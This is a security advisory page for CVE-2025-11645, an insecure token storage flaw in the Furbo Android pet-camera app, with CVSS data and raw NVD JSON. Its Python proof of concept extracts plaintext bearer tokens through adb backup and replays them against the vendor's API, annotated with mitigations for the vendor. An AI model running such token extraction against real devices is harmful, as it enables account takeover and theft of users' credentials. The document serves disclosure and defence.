Security Vulnerability Report
CVE-2025-11645 CVSS 2.4 LOW

CVE-2025-11645

Published: 2025-10-12 21:15:33
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in Tomofun Furbo Mobile App up to 7.57.0a on Android. This affects an unknown part of the component Authentication Token Handler. The manipulation leads to insecure storage of sensitive information. It is possible to launch the attack on the physical device. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Tomofun Furbo Mobile App <= 7.57.0a (Android)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11645 PoC - Furbo Mobile App Insecure Token Storage
# This PoC demonstrates how to extract authentication tokens from the Furbo Android app
# Requires physical access to the target device
#
# Weakness class (from the advisory record): CWE-922 insecure storage of
# sensitive information / CWE-200 information exposure. The script below
# only reads files the platform already exposes to whoever holds the device;
# the defect being demonstrated is that a bearer token is kept in plaintext
# in app-private storage rather than in hardware-backed storage (Android
# Keystore / EncryptedSharedPreferences) and that the app data is reachable
# through ADB backup and/or run-as on the tested build.
#
# Mitigations for the app vendor: keep tokens out of plaintext files,
# disallow ADB backup of the app's data (android:allowBackup="false" or
# backup rules that exclude the credential store), ship non-debuggable
# release builds, and keep tokens short-lived with server-side revocation
# so that a copied token has limited value.

import subprocess
import os
import re


def extract_furbo_token():
    """
    Extract authentication token from Furbo Mobile App's insecure storage.
    The app stores authentication tokens in plaintext within its private data directory.

    Returns:
        The token string found in the extracted backup, or ``None`` when no
        device is attached or no token-like value was found.

    Side effects:
        Shells out to ``adb``, ``dd`` and ``tar``; writes under ``/tmp``.
        All subprocess errors are captured and ignored, so a failed step is
        not reported — the function simply falls through to ``None``.
    """
    # Step 1: Check if ADB is available and device is connected
    # NOTE(review): `adb devices` prints a "List of devices attached" header,
    # which itself contains the substring "device"; this test is therefore
    # weaker than it looks and mainly confirms that adb ran at all.
    result = subprocess.run(['adb', 'devices'], capture_output=True, text=True)
    if 'device' not in result.stdout:
        print("No Android device connected via ADB")
        return None

    # Step 2: Attempt to backup the Furbo app data
    # Package name for Tomofun Furbo app
    package_name = "com.tomofun.furbo"
    backup_path = "/tmp/furbo_backup.ab"

    # `adb backup` only produces app data when the app permits backup; an
    # app that opts out of backup (or excludes its credential files via
    # backup rules) yields nothing here. That opt-out is the primary
    # platform-level mitigation for this access path.
    print(f"[*] Attempting to backup {package_name} data...")
    subprocess.run(['adb', 'backup', '-f', backup_path, package_name], capture_output=True)

    # Step 3: Extract backup contents
    if os.path.exists(backup_path):
        print("[*] Backup created. Extracting contents...")
        # `dd ... ibs=24 skip=1` drops the 24-byte .ab header so the
        # remainder can be handled as a tar archive. Errors from dd/tar are
        # swallowed (capture_output, no check=), so extraction problems
        # surface only as "no token found" later.
        subprocess.run(['dd', f'if={backup_path}', 'ibs=24', 'skip=1', 'of=/tmp/furbo_backup.tar'], capture_output=True)
        subprocess.run(['tar', '-xf', '/tmp/furbo_backup.tar', '-C', '/tmp/furbo_extracted/'], capture_output=True)

        # Step 4: Search for authentication tokens in extracted data
        # Matches JSON-style `"token": "<value>"` pairs for a few common key
        # names; group 2 is the value. Plaintext tokens in preference/JSON
        # files are exactly what hardware-backed storage would prevent.
        token_pattern = re.compile(r'(token|auth_token|access_token|jwt)"\s*:\s*"([^"]+)"')
        for root, dirs, files in os.walk('/tmp/furbo_extracted/'):
            for file in files:
                filepath = os.path.join(root, file)
                try:
                    # errors='ignore' lets binary files (e.g. SQLite) be
                    # scanned as text without raising.
                    with open(filepath, 'r', errors='ignore') as f:
                        content = f.read()
                        matches = token_pattern.findall(content)
                        if matches:
                            for match in matches:
                                print(f"[+] Found token in {filepath}: {match[1]}")
                            # Best-effort: returns the last match printed.
                            return match[1]
                except Exception:
                    # Unreadable files are skipped silently (best-effort scan).
                    pass

    # Alternative: Direct extraction via run-as (if debuggable)
    # `run-as` is only honoured by the platform for debuggable packages, so
    # a non-debuggable release build closes this path. The captured output
    # of the `cat` calls is not inspected or returned here; this branch
    # always falls through to `return None`.
    print("[*] Attempting direct extraction via run-as...")
    result = subprocess.run(
        ['adb', 'shell', 'run-as', package_name, 'find', '.', '-name', '*.xml', '-o', '-name', '*.db'],
        capture_output=True, text=True
    )
    for filepath in result.stdout.strip().split('\n'):
        if filepath:
            full_path = f"/data/data/{package_name}/{filepath}"
            subprocess.run(['adb', 'shell', 'run-as', package_name, 'cat', full_path], capture_output=True, text=True)

    return None


def use_extracted_token(token):
    """
    Demonstrate using the extracted token to access Furbo API.

    Args:
        token: Bearer token string as returned by ``extract_furbo_token``.

    Side effects:
        Performs one HTTPS GET against the API endpoint below and prints the
        JSON body on a 200 response. The fact that a token copied off the
        device is accepted unchanged is the server-side half of the risk;
        short token lifetimes, device/session binding and revocation on
        logout or reinstall limit how long a copied token stays usable, and
        a token suddenly used from a new client is a detectable signal on
        the API side.
    """
    # Third-party dependency (not part of the standard library); imported
    # lazily so the extraction path does not require it.
    import requests

    api_endpoint = "https://api.tomofun.com/v1/devices"
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }

    response = requests.get(api_endpoint, headers=headers)
    if response.status_code == 200:
        print("[+] Successfully accessed Furbo API with extracted token!")
        print(response.json())
    else:
        print(f"[-] Token may be expired or invalid. Status: {response.status_code}")


if __name__ == "__main__":
    # Entry point: run the extraction, then exercise the token if one was found.
    print("=" * 60)
    print("CVE-2025-11645 - Furbo Insecure Token Storage PoC")
    print("=" * 60)

    token = extract_furbo_token()
    if token:
        use_extracted_token(token)
    else:
        print("[-] Could not extract token. Ensure physical access to device.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11645", "sourceIdentifier": "[email protected]", "published": "2025-10-12T21:15:33.303", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Tomofun Furbo Mobile App up to 7.57.0a on Android. This affects an unknown part of the component Authentication Token Handler. The manipulation leads to insecure storage of sensitive information. It is possible to launch the attack on the physical device. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 0.9, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 2.1, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-922"}]}], "references": [{"url": "https://github.com/dead1nfluence/Furbo-Advisories/blob/main/Insecure.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.328056", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.328056", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.661899", "source": "[email protected]"}, {"url": "https://github.com/dead1nfluence/Furbo-Advisories/blob/main/Insecure.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}